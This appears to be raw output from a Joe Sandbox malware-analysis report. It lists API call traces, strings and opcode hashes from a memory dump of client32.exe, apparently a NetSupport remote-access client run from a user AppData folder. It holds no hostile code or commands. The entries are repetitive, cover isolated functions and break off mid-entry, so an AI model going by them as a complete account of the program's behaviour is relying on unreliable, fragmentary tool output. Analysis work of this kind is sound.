• Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
• Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
• Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
• Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
APIs
• RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
• RegCloseKey.ADVAPI32(?), ref: 11145FD4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseOpen
• String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
• API String ID: 47109696-3245241687
• Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
• Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
• Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
• Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
APIs
  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
• GetComputerNameA.KERNEL32(?,?), ref: 11112288
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                • API String ID: 806825551-1858614750
                                                                                • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
APIs
  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
• ResetEvent.KERNEL32(0000025C), ref: 11144E39
• SetEvent.KERNEL32(0000025C), ref: 11144E4F
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
• String ID: MiniDump
• API String ID: 1494854734-2840755058
• Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
• Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
• Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
• Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
APIs
• LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
• wsprintfA.USER32 ref: 11147A16
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastLoadMessageProcessString
• String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
• API String ID: 1985783259-2296142801
• Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
• Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
• Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
• Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
APIs
• _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
• wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• _memset.LIBCMT ref: 11110207
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
• String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
• API String ID: 3234921582-2664294811
• Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
• Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
• Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
• Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
APIs
  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
• LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
• GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
• FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
• String ID: SetProcessDpiAwareness$shcore.dll
• API String ID: 1108920153-1959555903
• Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
• Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
• Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
• Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
APIs
• wsprintfA.USER32 ref: 11031FE6
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess
• String ID: %s%s.bin$878411$clientinv.cpp$m_pDoInv == NULL
• API String ID: 4180936305-973242369
• Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
• Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
• Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
• Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                • __strdup.LIBCMT ref: 11145277
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                • _free.LIBCMT ref: 111452AC
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                • String ID:
                                                                                • API String ID: 398584587-0
                                                                                • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                APIs
                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                • _free.LIBCMT ref: 1100EE64
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _free.LIBCMT ref: 1100EE77
                                                                                • _free.LIBCMT ref: 1100EE8A
                                                                                • _free.LIBCMT ref: 1100EE9D
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                • String ID:
                                                                                • API String ID: 3515823920-0
                                                                                • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                APIs
                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                • wsprintfA.USER32 ref: 1114650E
                                                                                • wsprintfA.USER32 ref: 11146524
                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                • API String ID: 3779116287-2600120591
                                                                                • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                                • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                                • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                                • CoUninitialize.OLE32 ref: 110F4BE6
                                                                                Similarity
                                                                                • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                • String ID:
                                                                                • API String ID: 3550192930-0
                                                                                • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateFile$CloseHandle
                                                                                • String ID: "
                                                                                • API String ID: 1443461169-123907689
                                                                                • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,1B702977,75732EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                • String ID: Client$DisableGeolocation
                                                                                • API String ID: 3315423714-4166767992
                                                                                • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                                • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                                • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                • TranslateMessage.USER32(?), ref: 11027850
                                                                                • DispatchMessageA.USER32(?), ref: 11027856
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                • API String ID: 3212272093-2210386016
                                                                                • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                                • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 110179ED
                                                                                  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                                  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
